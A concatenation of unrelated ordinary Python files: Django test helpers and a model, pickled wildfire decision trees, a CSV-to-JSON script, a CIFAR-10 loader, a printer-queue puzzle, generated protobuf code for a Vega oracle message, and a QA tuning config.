        for group in Group.objects.filter(name__in=API_GROUPS):
            user.groups.add(group)
        user.set_password('password')
        user.save()
        return user

    def staff_user(self, program_family=None, level=CLEARANCE_LEVEL_STAFF):
        """Create a user holding a clearance at *level* (optionally scoped
        to *program_family*)."""
        user = self.make_user('basic_user{}@test.com'.format(self._user_count))
        self._user_count += 1
        kwargs = {"level": level,
                  "user": user}
        if program_family:
            kwargs['program_family'] = program_family
        clearance = ClearanceFactory(**kwargs)
        return clearance.user

    def global_operations_manager(self, program_family):
        """Create a staff user with a global-manager clearance for
        *program_family*."""
        user = self.staff_user()
        ClearanceFactory(user=user,
                         level=CLEARANCE_LEVEL_GLOBAL_MANAGER,
                         program_family=program_family)
        return user

    def get_access_token(self, user):
        """Register a throwaway OAuth app and return a password-grant
        access token for *user* (whose password must be 'password')."""
        app = OAuth_App.objects.create(
            user=user,
            name="Test666",
            client_type=OAuth_App.CLIENT_PUBLIC,
            authorization_grant_type=OAuth_App.GRANT_PASSWORD,
            redirect_uris="http://thirdparty.com/exchange/",
        )
        # NOTE(review): the `headers=` kwarg is only honoured by newer
        # Django test clients — confirm it has an effect on this version.
        response = self.client.post(
            self.reverse("oauth2_provider:token"),
            data={
                "password": 'password',
                "client_id": app.client_id,
                "username": user.username,
                "grant_type": "password",
            },
            headers={'Content-Type': 'application/x-www-form-urlencoded'}
        )
        response_json = json.loads(response.content)
        return response_json['access_token']

    def assert_options_include(self, method, expected_options, object_id=None):
        """Assert that an OPTIONS request on self.view advertises *method*
        with (at least) the given property metadata."""
        if object_id:
            args = [object_id]
        else:
            args = []
        url = reverse(self.view.view_name, args=args)
        with self.login(email=self.basic_user().email):
            response = self.client.options(url)
            result = json.loads(response.content)
            assert method in result['actions']
            options = result['actions'][method]['properties']
            for key, params in expected_options.items():
                self.assertIn(key, options)
                self.assertEqual(options[key], params)

    def assert_ui_notification(self, response, success, notification):
        """Assert the response carries the expected success flag, header,
        and detail text (self.success_header / self.fail_header)."""
        data = response.data
        detail = notification if notification else ""
        header = self.success_header if success else self.fail_header
        self.assertTrue(all([
            data['success'] == success,
            data['header'] == header,
            data['detail'] == detail
        ]), msg='Notification data was not as expected')

    def assert_notified(self,
                        user,
                        message="",
                        subject="",
                        check_alternative=False):
        '''Assert that the user received a notification.
        If `message` is specified, assert that the message appears in one of
        the outgoing emails to this user. With `check_alternative`, search
        the HTML/alternative bodies instead of the plain-text body.
        '''
        emails = [email for email in mail.outbox if user.email in email.to]
        self.assertGreater(len(emails), 0)
        if message:
            if check_alternative:
                self.assertTrue(any([_message_included_in_email_alternative(
                    email, message) for email in emails]))
            else:
                self.assertTrue(any([
                    message in email.body for email in emails]))
        if subject:
            self.assertIn(subject, [email.subject for email in emails])

    def assert_ics_email_attachments(self, user):
        '''Assert that every email to *user* carries a reminder.ics
        attachment.
        '''
        emails = [email for email in mail.outbox if user.email in email.to]
        for email in emails:
            attachments = email.attachments
            self.assertGreater(len(attachments), 0)
            self.assertIn("reminder.ics",
                          [attachment[0] for attachment in attachments])

    def assert_not_notified(self, user):
        '''Assert that the specified user did not receive a notification.

        Fix: the old check tested `user.email in [email.to for ...]`, i.e.
        a string against a list of lists, which could never match and so
        the assertion always passed.
        '''
        recipients = [addr for email in mail.outbox for addr in email.to]
        self.assertNotIn(user.email, recipients,
                         msg="Found an email sent to user")
def _message_included_in_email_alternative(email, message):
    """Return True when *message* occurs in any alternative body of *email*."""
    for alternative in email.alternatives:
        # Each alternative is (content, mimetype); search the content.
        if message in alternative[0]:
            return True
    return False
| 5,829 | 1,636 |
from django.db import models
from pydis_site.apps.api.models.bot.user import User
from pydis_site.apps.api.models.mixins import ModelReprMixin
class AocAccountLink(ModelReprMixin, models.Model):
    """An AoC account link for a Discord User."""

    # One link per Discord user; deleting the user removes the link.
    user = models.OneToOneField(
        User,
        on_delete=models.CASCADE,
        # Fix: the old help_text ("...blocked from getting the AoC
        # Completionist Role") was copy-pasted from the blocklist model
        # and described blocking, not linking.
        help_text="The user that is linked to the AoC account",
        primary_key=True
    )
    aoc_username = models.CharField(
        max_length=120,
        help_text="The AoC username associated with the Discord User.",
        blank=False
    )
import pickle
best_trees = [
{'accuracy': 0.36416184971098264, 'tree':
['Attribute', 'att1',
['Value', 'Pend Oreille',
['Leaf', 2.0, 0, 69]
],
['Value', 'Okanogan',
['Leaf', 3.0, 0, 314]
],
['Value', 'Lincoln',
['Leaf', 5.0, 0, 55]
],
['Value', 'Grant',
['Leaf', 5.0, 0, 4]
], ['Value', 'Chelan', ['Leaf', 3.0, 0, 136]], ['Value', 'Stevens', ['Attribute', 'att2', ['Value', 'Recreation', ['Leaf', 2.0, 0, 18]], ['Value', 'Miscellaneou', ['Leaf', 2.0, 0, 83]], ['Value', 'Lightning', ['Leaf', 2.0, 0, 43]], ['Value', 'Under Invest', ['Leaf', 5.0, 0, 6]], ['Value', 'Debris Burn', ['Leaf', 3.0, 0, 120]], ['Value', 'Children', ['Leaf', 3.0, 0, 8]], ['Value', 'None', ['Leaf', 5.0, 1, 308]], ['Value', 'Smoker', ['Leaf', 2.0, 0, 7]], ['Value', 'Logging', ['Leaf', 3.0, 0, 8]], ['Value', 'Arson', ['Leaf', 2.0, 0, 5]], ['Value', 'Undetermined', ['Leaf', 9.0, 2, 308]], ['Value', 'Railroad', ['Leaf', 4.0, 0, 7]]]], ['Value', 'Clark', ['Leaf', 3.0, 0, 20]], ['Value', 'Yakima', ['Leaf', 3.0, 0, 97]], ['Value', 'Spokane', ['Attribute', 'att2', ['Value', 'Recreation', ['Leaf', 2.0, 0, 23]], ['Value', 'Miscellaneou', ['Leaf', 2.0, 0, 142]], ['Value', 'Lightning', ['Leaf', 3.0, 0, 24]], ['Value', 'Under Invest', ['Leaf', 3.0, 0, 4]], ['Value', 'Debris Burn', ['Leaf', 2.0, 0, 54]], ['Value', 'Children', ['Leaf', 3.0, 0, 20]], ['Value', 'None', ['Leaf', 3.0, 3, 326]], ['Value', 'Smoker', ['Leaf', 2.0, 0, 2]], ['Value', 'Logging', ['Leaf', 2.0, 0, 3]], ['Value', 'Arson', ['Leaf', 2.0, 0, 29]], ['Value', 'Undetermined', ['Leaf', 2.0, 0, 7]], ['Value', 'Railroad', ['Leaf', 2.0, 0, 15]]]], ['Value', 'Pierce', ['Leaf', 3.0, 0, 55]], ['Value', 'Skagit', ['Leaf', 3.0, 0, 34]], ['Value', 'Grays Harbor', ['Leaf', 3.0, 0, 52]], ['Value', 'Skamania', ['Leaf', 3.0, 0, 28]], ['Value', 'King', ['Leaf', 3.0, 0, 41]], ['Value', 'Island', ['Leaf', 3.0, 0, 7]], ['Value', 'Klickitat', ['Leaf', 3.0, 0, 180]], ['Value', 'Whitman', ['Leaf', 7.0, 0, 5]], ['Value', 'Cowlitz', ['Leaf', 3.0, 0, 68]], ['Value', 'Douglas', ['Leaf', 5.0, 0, 27]], ['Value', 'Ferry', ['Leaf', 3.0, 0, 72]], ['Value', 'Mason', ['Leaf', 3.0, 0, 66]], ['Value', 'Kittitas', ['Leaf', 3.0, 0, 99]], ['Value', 'Jefferson', ['Leaf', 3.0, 0, 30]], ['Value', 'Franklin', ['Leaf', 5.0, 3, 2503]], ['Value', 'Clallam', 
['Leaf', 3.0, 0, 44]], ['Value', 'Pacific', ['Leaf', 3.0, 0, 51]], ['Value', 'Lewis', ['Leaf', 3.0, 0, 93]], ['Value', 'Thurston', ['Leaf', 2.0, 0, 59]], ['Value', 'Walla Walla', ['Leaf', 3.0, 0, 18]], ['Value', 'Snohomish', ['Leaf', 3.0, 0, 38]], ['Value', 'Asotin', ['Leaf', 4.0, 0, 23]], ['Value', 'Adams', ['Leaf', 5.0, 1, 2503]], ['Value', 'Whatcom', ['Leaf', 2.0, 0, 40]], ['Value', 'San Juan', ['Leaf', 3.0, 0, 7]], ['Value', 'Garfield', ['Leaf', 3.0, 0, 10]], ['Value', 'Columbia', ['Leaf', 3.0, 0, 14]], ['Value', 'Benton', ['Leaf', 7.0, 1, 2503]], ['Value', 'Wahkiakum', ['Leaf', 3.0, 5, 2503]], ['Value', 'No Data', ['Leaf', 4.0, 1, 2503]], ['Value', 'Kitsap', ['Leaf', 3.0, 0, 2]]]}, {'accuracy': 0.34375, 'tree': ['Attribute', 'att1', ['Value', 'Klickitat', ['Leaf', 2.0, 0, 150]], ['Value', 'Ferry', ['Leaf', 3.0, 0, 66]], ['Value', 'Okanogan', ['Leaf', 3.0, 0, 341]], ['Value', 'Clallam', ['Leaf', 3.0, 0, 53]], ['Value', 'Lewis', ['Leaf', 3.0, 0, 105]], ['Value', 'Kittitas', ['Leaf', 3.0, 0, 115]], ['Value', 'Spokane', ['Attribute', 'att2', ['Value', 'Recreation', ['Leaf', 2.0, 0, 31]], ['Value', 'Arson', ['Leaf', 2.0, 0, 37]], ['Value', 'Lightning', ['Leaf', 3.0, 0, 25]], ['Value', 'Miscellaneou', ['Leaf', 3.0, 0, 122]], ['Value', 'Logging', ['Leaf', 3.0, 1, 318]], ['Value', 'Under Invest', ['Leaf', 5.0, 4, 318]], ['Value', 'Debris Burn', ['Leaf', 3.0, 0, 51]], ['Value', 'Railroad', ['Leaf', 2.0, 0, 25]], ['Value', 'Children', ['Leaf', 4.0, 0, 12]], ['Value', 'Undetermined', ['Leaf', 5.0, 0, 5]], ['Value', 'Smoker', ['Leaf', 6.0, 0, 4]], ['Value', 'None', ['Leaf', 3.0, 1, 318]]]], ['Value', 'Chelan', ['Leaf', 3.0, 0, 142]], ['Value', 'Mason', ['Leaf', 3.0, 0, 69]], ['Value', 'Lincoln', ['Leaf', 3.0, 0, 79]], ['Value', 'Yakima', ['Leaf', 3.0, 0, 82]], ['Value', 'Jefferson', ['Leaf', 3.0, 0, 32]], ['Value', 'Pend Oreille', ['Leaf', 2.0, 0, 61]], ['Value', 'Stevens', ['Attribute', 'att2', ['Value', 'Recreation', ['Leaf', 2.0, 0, 15]], ['Value', 'Arson', ['Leaf', 
2.0, 0, 11]], ['Value', 'Lightning', ['Leaf', 3.0, 0, 33]], ['Value', 'Miscellaneou', ['Leaf', 3.0, 0, 84]], ['Value', 'Logging', ['Leaf', 3.0, 4, 290]], ['Value', 'Under Invest', ['Leaf', 5.0, 0, 4]], ['Value', 'Debris Burn', ['Leaf', 2.0, 0, 117]], ['Value', 'Railroad', ['Leaf', 2.0, 0, 6]], ['Value', 'Children', ['Leaf', 2.0, 0, 4]], ['Value', 'Undetermined', ['Leaf', 9.0, 1, 290]], ['Value', 'Smoker', ['Leaf', 2.0, 0, 10]], ['Value', 'None', ['Leaf', 5.0, 1, 290]]]], ['Value', 'Cowlitz', ['Leaf', 3.0, 0, 77]], ['Value', 'Pierce', ['Leaf', 3.0, 0, 58]], ['Value', 'King', ['Leaf', 2.0, 0, 23]], ['Value', 'Walla Walla', ['Leaf', 3.0, 0, 24]], ['Value', 'Douglas', ['Leaf', 6.0, 0, 17]], ['Value', 'Island', ['Leaf', 3.0, 0, 9]], ['Value', 'Skamania', ['Leaf', 3.0, 0, 27]], ['Value', 'Thurston', ['Leaf', 2.0, 0, 52]], ['Value', 'Columbia', ['Leaf', 3.0, 0, 15]], ['Value', 'Snohomish', ['Leaf', 3.0, 0, 36]], ['Value', 'Skagit', ['Leaf', 3.0, 0, 47]], ['Value', 'Pacific', ['Leaf', 3.0, 0, 36]], ['Value', 'Grays Harbor', ['Leaf', 2.0, 0, 56]], ['Value', 'Whatcom', ['Leaf', 3.0, 0, 37]], ['Value', 'Clark', ['Leaf', 3.0, 0, 30]], ['Value', 'Kitsap', ['Leaf', 3.0, 2, 2503]], ['Value', 'San Juan', ['Leaf', 3.0, 0, 9]], ['Value', 'Asotin', ['Leaf', 4.0, 0, 20]], ['Value', 'Garfield', ['Leaf', 3.0, 0, 7]], ['Value', 'Adams', ['Leaf', 5.0, 2, 2503]], ['Value', 'Wahkiakum', ['Leaf', 2.0, 0, 7]], ['Value', 'Whitman', ['Leaf', 5.0, 0, 5]], ['Value', 'Grant', ['Leaf', 5.0, 1, 2503]], ['Value', 'No Data', ['Leaf', 4.0, 0, 2]], ['Value', 'Benton', ['Leaf', 7.0, 1, 2503]]]}, {'accuracy': 0.33568904593639576, 'tree': ['Attribute', 'att1', ['Value', 'Stevens', ['Attribute', 'att2', ['Value', 'Recreation', ['Leaf', 2.0, 0, 24]], ['Value', 'Debris Burn', ['Leaf', 2.0, 0, 105]], ['Value', 'Children', ['Leaf', 3.0, 0, 4]], ['Value', 'Miscellaneou', ['Leaf', 3.0, 0, 80]], ['Value', 'Railroad', ['Leaf', 2.0, 0, 6]], ['Value', 'Undetermined', ['Leaf', 9.0, 3, 300]], ['Value', 'Logging', 
['Leaf', 3.0, 0, 9]], ['Value', 'Lightning', ['Leaf', 2.0, 0, 39]], ['Value', 'Smoker', ['Leaf', 2.0, 0, 8]], ['Value', 'None', ['Leaf', 5.0, 2, 300]], ['Value', 'Arson', ['Leaf', 3.0, 0, 15]], ['Value', 'Under Invest', ['Leaf', 3.0, 0, 5]]]], ['Value', 'Grays Harbor', ['Leaf', 2.0, 0, 49]], ['Value', 'Chelan', ['Leaf', 3.0, 0, 143]], ['Value', 'Okanogan', ['Leaf', 3.0, 0, 306]], ['Value', 'Spokane', ['Attribute', 'att2', ['Value', 'Recreation', ['Leaf', 2.0, 0, 27]], ['Value', 'Debris Burn', ['Leaf', 3.0, 0, 66]], ['Value', 'Children', ['Leaf', 2.0, 0, 10]], ['Value', 'Miscellaneou', ['Leaf', 3.0, 0, 152]], ['Value', 'Railroad', ['Leaf', 2.0, 0, 21]], ['Value', 'Undetermined', ['Leaf', 5.0, 0, 8]], ['Value', 'Logging', ['Leaf', 2.0, 0, 2]], ['Value', 'Lightning', ['Leaf', 3.0, 0, 25]], ['Value', 'Smoker', ['Leaf', 3.0, 0, 3]], ['Value', 'None', ['Leaf', 2.0, 0, 5]], ['Value', 'Arson', ['Leaf', 2.0, 0, 24]], ['Value', 'Under Invest', ['Leaf', 5.0, 2, 345]]]], ['Value', 'Cowlitz', ['Leaf', 3.0, 0, 74]], ['Value', 'Lincoln', ['Leaf', 3.0, 0, 66]], ['Value', 'Kittitas', ['Leaf', 3.0, 0, 122]], ['Value', 'Pacific', ['Leaf', 3.0, 0, 61]], ['Value', 'Skagit', ['Leaf', 3.0, 0, 57]], ['Value', 'Lewis', ['Leaf', 3.0, 0, 111]], ['Value', 'Island', ['Leaf', 3.0, 0, 8]], ['Value', 'Klickitat', ['Leaf', 2.0, 0, 193]], ['Value', 'Walla Walla', ['Leaf', 4.0, 0, 19]], ['Value', 'Jefferson', ['Leaf', 3.0, 0, 23]], ['Value', 'Garfield', ['Leaf', 7.0, 0, 6]], ['Value', 'Thurston', ['Leaf', 2.0, 0, 50]], ['Value', 'King', ['Leaf', 3.0, 0, 33]], ['Value', 'Douglas', ['Leaf', 6.0, 0, 28]], ['Value', 'Yakima', ['Leaf', 3.0, 0, 90]], ['Value', 'Mason', ['Leaf', 3.0, 0, 55]], ['Value', 'Snohomish', ['Leaf', 3.0, 0, 27]], ['Value', 'Pierce', ['Leaf', 3.0, 0, 44]], ['Value', 'Kitsap', ['Leaf', 3.0, 0, 6]], ['Value', 'Clark', ['Leaf', 3.0, 0, 18]], ['Value', 'Columbia', ['Leaf', 3.0, 0, 17]], ['Value', 'Pend Oreille', ['Leaf', 3.0, 0, 45]], ['Value', 'Skamania', ['Leaf', 3.0, 0, 27]], 
['Value', 'Asotin', ['Leaf', 7.0, 0, 17]], ['Value', 'Whatcom', ['Leaf', 3.0, 0, 39]], ['Value', 'Ferry', ['Leaf', 3.0, 0, 72]], ['Value', 'Wahkiakum', ['Leaf', 3.0, 1, 2503]], ['Value', 'Clallam', ['Leaf', 3.0, 0, 38]], ['Value', 'Adams', ['Leaf', 5.0, 3, 2503]], ['Value', 'San Juan', ['Leaf', 2.0, 0, 3]], ['Value', 'Grant', ['Leaf', 6.0, 1, 2503]], ['Value', 'No Data', ['Leaf', 4.0, 0, 2]], ['Value', 'Whitman', ['Leaf', 5.0, 0, 4]]]}, {'accuracy': 0.33390705679862304, 'tree': ['Attribute', 'att1', ['Value', 'Spokane', ['Leaf', 3.0, 0, 364]], ['Value', 'Stevens', ['Leaf', 2.0, 0, 298]], ['Value', 'Klickitat', ['Leaf', 3.0, 0, 165]], ['Value', 'Okanogan', ['Leaf', 3.0, 0, 340]], ['Value', 'Yakima', ['Leaf', 5.0, 0, 88]], ['Value', 'Chelan', ['Leaf', 3.0, 0, 110]], ['Value', 'Cowlitz', ['Leaf', 3.0, 0, 84]], ['Value', 'Thurston', ['Leaf', 2.0, 0, 78]], ['Value', 'Pend Oreille', ['Leaf', 2.0, 0, 46]], ['Value', 'Pierce', ['Leaf', 3.0, 0, 45]], ['Value', 'Mason', ['Leaf', 3.0, 0, 69]], ['Value', 'Grays Harbor', ['Leaf', 2.0, 0, 58]], ['Value', 'Douglas', ['Leaf', 6.0, 0, 33]], ['Value', 'Ferry', ['Leaf', 3.0, 0, 77]], ['Value', 'Skagit', ['Leaf', 3.0, 0, 39]], ['Value', 'Clark', ['Leaf', 2.0, 0, 28]], ['Value', 'Kittitas', ['Leaf', 3.0, 0, 108]], ['Value', 'Lewis', ['Leaf', 3.0, 0, 106]], ['Value', 'Skamania', ['Leaf', 3.0, 0, 25]], ['Value', 'King', ['Leaf', 3.0, 0, 23]], ['Value', 'Asotin', ['Leaf', 3.0, 0, 24]], ['Value', 'Snohomish', ['Leaf', 3.0, 0, 26]], ['Value', 'Pacific', ['Leaf', 2.0, 0, 36]], ['Value', 'Jefferson', ['Leaf', 3.0, 0, 29]], ['Value', 'Clallam', ['Leaf', 3.0, 0, 44]], ['Value', 'Lincoln', ['Leaf', 3.0, 0, 56]], ['Value', 'Walla Walla', ['Leaf', 3.0, 0, 18]], ['Value', 'Island', ['Leaf', 3.0, 6, 2503]], ['Value', 'Whatcom', ['Leaf', 3.0, 0, 26]], ['Value', 'Benton', ['Leaf', 7.0, 1, 2503]], ['Value', 'Kitsap', ['Leaf', 3.0, 0, 8]], ['Value', 'San Juan', ['Leaf', 2.0, 0, 14]], ['Value', 'Columbia', ['Leaf', 3.0, 0, 16]], ['Value', 'Franklin', 
['Leaf', 5.0, 1, 2503]], ['Value', 'Grant', ['Leaf', 5.0, 4, 2503]], ['Value', 'Garfield', ['Leaf', 3.0, 0, 5]], ['Value', 'Whitman', ['Leaf', 7.0, 2, 2503]], ['Value', 'Wahkiakum', ['Leaf', 2.0, 1, 2503]], ['Value', 'No Data', ['Leaf', 3.0, 1, 2503]], ['Value', 'Adams', ['Leaf', 5.0, 1, 2503]]]}]
# Persist the selected decision trees so later runs can load them without
# re-training.
packaged_object = best_trees
# pickle packaged_object
# Use a context manager so the file handle is closed even if pickle.dump
# raises (the original left the handle open on error).
with open("trees.p", "wb") as outfile:
    pickle.dump(packaged_object, outfile)
import json
# Parse kdb.csv into kdb.json: keep six quoted columns per row and index
# the resulting records by the first of those columns.
with open("kdb.csv", "r", encoding="utf_8") as f:
    l=[]
    lines = f.readlines()
    # remove the header
    lines.pop(0)
    for line in lines:
        # Split on double quotes: quoted field contents land at odd indices.
        tmp1 = line.split('"')
        # Field 15 may be legitimately empty; substitute a space so the
        # emptiness filter below does not discard the whole row.
        if tmp1[15] == "":
            tmp1[15] = " "
        # Skip rows where any required column is empty.
        if not "" in set([tmp1[1], tmp1[3], tmp1[11], tmp1[13], tmp1[15], tmp1[21]]):
            l.append([tmp1[1], tmp1[3], tmp1[11], tmp1[13], tmp1[15], tmp1[21]])
json_data = {}
# NOTE(review): the header was already removed above, so this drops the
# first *data* record as well — confirm this is intentional.
l.pop(0)
for i in l:
    # First extracted column becomes the JSON key, the rest the value.
    json_data[i[0]] = i[1:]
enc = json.dumps(json_data,ensure_ascii=False)
with open("kdb.json", "w") as f:
    f.write(enc)
print("complete")
import os
import shutil
import tarfile
import urllib.request
import pandas as pd
# Canonical download location of the CIFAR-10 python pickle archive.
CIFAR10_URL = 'https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz'


class CIFAR_10:
    """Download the CIFAR-10 python archive and expose its batches as CSVs.

    After construction, ``TrainFile`` points at a merged CSV of the five
    training batches and ``TestFile`` at the test-batch CSV; ``repr()``
    yields one of those paths depending on the ``train`` flag.
    """

    def __init__(self, path, download=True, train=True):
        # path: directory (relative to cwd) for download/extraction.
        # download: when True, fetch and unpack the tarball first.
        # train: selects which file path __repr__ reports.
        self.path = path
        self.download = download
        self.train = train
        self.csv_list = []
        if self.download:
            self._Download()
        # From here on self.path is absolute.
        self.path = os.getcwd() + '/' + self.path
        self.toCSV()
        self.TrainFile = self.path + '/' + 'cifar-10-batches-py/train_cifar.csv'
        self.TestFile = self.path + '/' + 'cifar-10-batches-py/test_batch.csv'

    def _Download(self):
        """Download the CIFAR-10 tarball into self.path and extract it."""
        if not os.path.exists(os.getcwd() + '/' + self.path):
            os.mkdir(self.path)
        file_name = 'CIFAR-10.tar.gz'
        # Stream the HTTP response straight to disk.
        with urllib.request.urlopen(CIFAR10_URL) as response, open(os.getcwd() + '/' + self.path + '/' + file_name,
                                                                   'wb') as out_file:
            shutil.copyfileobj(response, out_file)
        tar = tarfile.open(os.getcwd() + '/' + self.path + '/' + file_name, "r:gz")
        tar.extractall(os.getcwd() + '/' + self.path + '/')
        tar.close()

    def unpickle(self, file):
        """Load one pickled CIFAR batch; keys are bytes (b'labels', b'data')."""
        import pickle
        with open(file, 'rb') as fo:
            dict = pickle.load(fo, encoding='bytes')
        return dict

    def toCSV(self):
        """Write each batch as '<name>.csv' (label column first, then pixels)
        and merge the five training batches into train_cifar.csv.

        Existing CSV files are left untouched, so repeated runs are cheap.
        """
        file_names = ['data_batch_1', 'data_batch_2', 'data_batch_3', 'data_batch_4', 'data_batch_5', 'test_batch']
        for name in file_names:
            df_labels = pd.DataFrame(self.unpickle(self.path + '/' + 'cifar-10-batches-py/' + name)[b'labels'])
            df_data = pd.DataFrame(self.unpickle(self.path + '/' + 'cifar-10-batches-py/' + name)[b'data'])
            new = pd.concat([df_labels, df_data], axis=1)
            if not os.path.exists(self.path + '/' + 'cifar-10-batches-py/' + name + '.csv'):
                new.to_csv(self.path + '/' + 'cifar-10-batches-py/' + name + '.csv', index=False)
        for name in file_names[0:5]:
            self.csv_list.append(self.path + '/' + 'cifar-10-batches-py/' + name + '.csv')
        if not os.path.exists(self.path + '/' + 'cifar-10-batches-py/train_cifar.csv'):
            # NOTE(review): the per-batch CSVs were written *with* a header
            # row, but are re-read here with header=None, so each file's
            # header line ends up in the merged data — confirm intent.
            df_from_each_file = (pd.read_csv(f, sep=',', header=None) for f in self.csv_list)
            df_merged = pd.concat(df_from_each_file, ignore_index=True)
            df_merged.to_csv(self.path + '/' + 'cifar-10-batches-py/train_cifar.csv', index=False)

    def __repr__(self):
        # Report the train or test CSV path depending on the `train` flag.
        return self.TrainFile if self.train == True else self.TestFile
def printer(n, k, order):
    """Print how many jobs the printer completes up to and including job *k*.

    The printer repeatedly inspects the front of the queue: if any queued job
    has a strictly higher priority, the front job is moved to the back,
    otherwise it is printed.  The original O(n^2) deque simulation is replaced
    by a direct O(n) count, which gives the same answer:

    * every job with a strictly higher priority than job *k* prints first;
    * every job with the same priority at position <= k prints no later than
      job *k* (job *k* itself included) — equal-priority jobs behind *k*
      cannot overtake it, since cyclic queue order is preserved by rotation.

    Args:
        n: number of jobs (unused; kept for interface compatibility).
        k: index of the job of interest in *order*.
        order: list of job priorities.
    """
    p = order[k]
    finished = sum(1 for i, x in enumerate(order) if x > p or (x == p and i <= k))
    print(finished)
# Driver: first line is the number of test cases; each case supplies n and k
# on one line and the n job priorities on the next, then reports the finish
# position of job k via printer() above.
for _ in range(int(input())):
    n,k=map(int,input().split())
    lst=list(map(int,input().split()))
    printer(n,k,lst)
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: commands/v1/oracles.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
# NOTE: protoc-generated module — regenerate from commands/v1/oracles.proto
# rather than editing by hand; only comments were added below.

# File-level descriptor (package vega.commands.v1, proto3 syntax);
# serialized_pb is the wire-encoded FileDescriptorProto.
DESCRIPTOR = _descriptor.FileDescriptor(
  name='commands/v1/oracles.proto',
  package='vega.commands.v1',
  syntax='proto3',
  serialized_options=b'\n io.vegaprotocol.vega.commands.v1Z+code.vegaprotocol.io/vega/proto/commands/v1',
  create_key=_descriptor._internal_create_key,
  serialized_pb=b'\n\x19\x63ommands/v1/oracles.proto\x12\x10vega.commands.v1\"\xcb\x01\n\x14OracleDataSubmission\x12K\n\x06source\x18\x01 \x01(\x0e\x32\x33.vega.commands.v1.OracleDataSubmission.OracleSourceR\x06source\x12\x18\n\x07payload\x18\x02 \x01(\x0cR\x07payload\"L\n\x0cOracleSource\x12\x1d\n\x19ORACLE_SOURCE_UNSPECIFIED\x10\x00\x12\x1d\n\x19ORACLE_SOURCE_OPEN_ORACLE\x10\x01\x42O\n io.vegaprotocol.vega.commands.v1Z+code.vegaprotocol.io/vega/proto/commands/v1b\x06proto3'
)

# Enum descriptor for OracleDataSubmission.OracleSource.
_ORACLEDATASUBMISSION_ORACLESOURCE = _descriptor.EnumDescriptor(
  name='OracleSource',
  full_name='vega.commands.v1.OracleDataSubmission.OracleSource',
  filename=None,
  file=DESCRIPTOR,
  create_key=_descriptor._internal_create_key,
  values=[
    _descriptor.EnumValueDescriptor(
      name='ORACLE_SOURCE_UNSPECIFIED', index=0, number=0,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='ORACLE_SOURCE_OPEN_ORACLE', index=1, number=1,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
  ],
  containing_type=None,
  serialized_options=None,
  serialized_start=175,
  serialized_end=251,
)
_sym_db.RegisterEnumDescriptor(_ORACLEDATASUBMISSION_ORACLESOURCE)

# Message descriptor for OracleDataSubmission
# (field 1: source enum, field 2: payload bytes).
_ORACLEDATASUBMISSION = _descriptor.Descriptor(
  name='OracleDataSubmission',
  full_name='vega.commands.v1.OracleDataSubmission',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='source', full_name='vega.commands.v1.OracleDataSubmission.source', index=0,
      number=1, type=14, cpp_type=8, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, json_name='source', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='payload', full_name='vega.commands.v1.OracleDataSubmission.payload', index=1,
      number=2, type=12, cpp_type=9, label=1,
      has_default_value=False, default_value=b"",
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, json_name='payload', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
    _ORACLEDATASUBMISSION_ORACLESOURCE,
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=48,
  serialized_end=251,
)
# Wire up the cross-references, register everything, and build the
# concrete message class via the reflection metaclass.
_ORACLEDATASUBMISSION.fields_by_name['source'].enum_type = _ORACLEDATASUBMISSION_ORACLESOURCE
_ORACLEDATASUBMISSION_ORACLESOURCE.containing_type = _ORACLEDATASUBMISSION
DESCRIPTOR.message_types_by_name['OracleDataSubmission'] = _ORACLEDATASUBMISSION
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
OracleDataSubmission = _reflection.GeneratedProtocolMessageType('OracleDataSubmission', (_message.Message,), {
  'DESCRIPTOR' : _ORACLEDATASUBMISSION,
  '__module__' : 'commands.v1.oracles_pb2'
  # @@protoc_insertion_point(class_scope:vega.commands.v1.OracleDataSubmission)
  })
_sym_db.RegisterMessage(OracleDataSubmission)
DESCRIPTOR._options = None
| 4,119 | 1,588 |
import os
# Options shared by all non-regression tuning runs.
parameter_tuning_options = {
    "experiment_name": "non-regression-tests",
    # Tuning method alternatives:
    # - "optimization": use bayesian optimisation
    # - "grid_search"
    "tuning_method": "grid_search",
    # Additional options for the grid search method
    "use_cache": False,
    # Additional options for the optimization method
    "optimization_ncalls": 10,
}

# Grid-search parameter space for the FQuAD dataset run.
parameters_fquad = {
    "k_retriever": [5],
    "k_title_retriever" : [1], # must be present, but only used when retriever_type == title_bm25
    "k_reader_per_candidate": [20],
    "k_reader_total": [10],
    "reader_model_version": ["053b085d851196110d7a83d8e0f077d0a18470be"],
    "retriever_model_version": ["1a01b38498875d45f69b2a6721bf6fe87425da39"],
    "dpr_model_version": ["v1.0"],
    "retriever_type": ["bm25"], # Can be bm25, sbert, dpr, title or title_bm25
    "squad_dataset": [
        os.getenv("DATA_DIR") + "/non-regression-tests/fquad_dataset.json"
    ],
    "filter_level": [None],
    "preprocessing": [False],
    "boosting" : [1], #default to 1
    "split_by": ["word"], # Can be "word", "sentence", or "passage"
    "split_length": [1000],
}

# A dictionary specifying the criteria a test result must pass.  Keys are
# metric names; values are predicates on the corresponding metric which must
# return true if the value is satisfying.
pass_criteria_fquad = {
    "reader_topk_accuracy_has_answer":
        # metric ~= 0.747 +/- 1%
        lambda metric: abs(metric / 0.747 - 1) < 0.01
}

# Grid-search parameter space for the DILA knowledge-base run.
parameters_dila = {
    "k_retriever": [1],
    "k_title_retriever" : [1], # must be present, but only used when retriever_type == title_bm25
